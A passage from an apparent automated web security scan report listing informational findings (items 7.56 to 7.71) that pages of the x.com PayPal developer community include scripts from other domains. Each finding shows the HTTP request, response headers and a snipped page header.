User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032333b31342c323032343b31342c323036333b31342c323032323b31342c323036343b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:05 GMT; Path=/
Vary: User-Agent
JP: D=250524 t=1313157065371592
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.56. https://www.x.com/community/ppx/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/showcase HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:55 GMT; Path=/
Vary: User-Agent
JP: D=95160 t=1313156335154548
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.57. https://www.x.com/community/ppx/showcase/ap_directory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/showcase/ap_directory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/showcase/ap_directory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=626237 t=1313157082735465
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.58. https://www.x.com/community/ppx/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/support

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/support HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038323b31342c323134323b31342c323134333b31342c323134343b31342c323030353b31342c323134363b31342c323134353b31342c323034373b31342c323034363b31342c323034353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=62142 t=1313157079746964
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.59. https://www.x.com/community/ppx/system_status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/system_status

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/system_status HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032323b31342c323033303b31342c323033373b31342c323032393b31342c323033323b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=141197 t=1313157063543336
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.60. https://www.x.com/community/ppx/testing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/testing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/testing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033323b31342c323033373b31342c323032393b31342c323033303b31342c323032383b31342c323036333b31342c323032373b31342c323032363b31342c323032303b31342c323031383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:03 GMT; Path=/
Vary: User-Agent
JP: D=129679 t=1313157063076344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.61. https://www.x.com/community/ppx/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/training

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/training HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033343b31342c323032343b31342c323036343b31342c323032353b31342c323032333b31342c323036333b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=90627 t=1313157066413831
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.62. https://www.x.com/community/ppx/transaction_information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/transaction_information

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/transaction_information HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032363b31342c323032303b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=127710 t=1313157060376316
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.63. https://www.x.com/community/ppx/vt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/vt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/vt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031353b31342c323031333b31342c323234363b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=134897 t=1313157057107460
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.64. https://www.x.com/community/ppx/website_reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/website_reporting

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/website_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033303b31342c323032373b31342c323036333b31342c323032383b31342c323032363b31342c323032393b31342c323032303b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=106773 t=1313157062233186
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.65. https://www.x.com/community/ppx/wpp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wpp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030393b31342c323030333b31342c323030383b31342c323031343b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=148526 t=1313157033667453
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.66. https://www.x.com/community/ppx/wpphosted  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wpphosted

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wpphosted HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323234363b31342c323031333b31342c323236393b31342c323031353b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:57 GMT; Path=/
Vary: User-Agent
JP: D=67132 t=1313157057503117
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.67. https://www.x.com/community/ppx/wps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/wps

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/wps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030363b31342c323031333b31342c323236393b31342c323031353b31342c323031363b31342c323234363b31342c323232313b31342c323235313b31342c323130303b31342c323038343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:58 GMT; Path=/
Vary: User-Agent
JP: D=181388 t=1313157058055328
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.68. https://www.x.com/community/ppx/xspaces  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.69. https://www.x.com/community/ppx/xspaces/accelerator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.70. https://www.x.com/community/ppx/xspaces/certification  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.71. https://www.x.com/community/ppx/xspaces/cloud-computing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
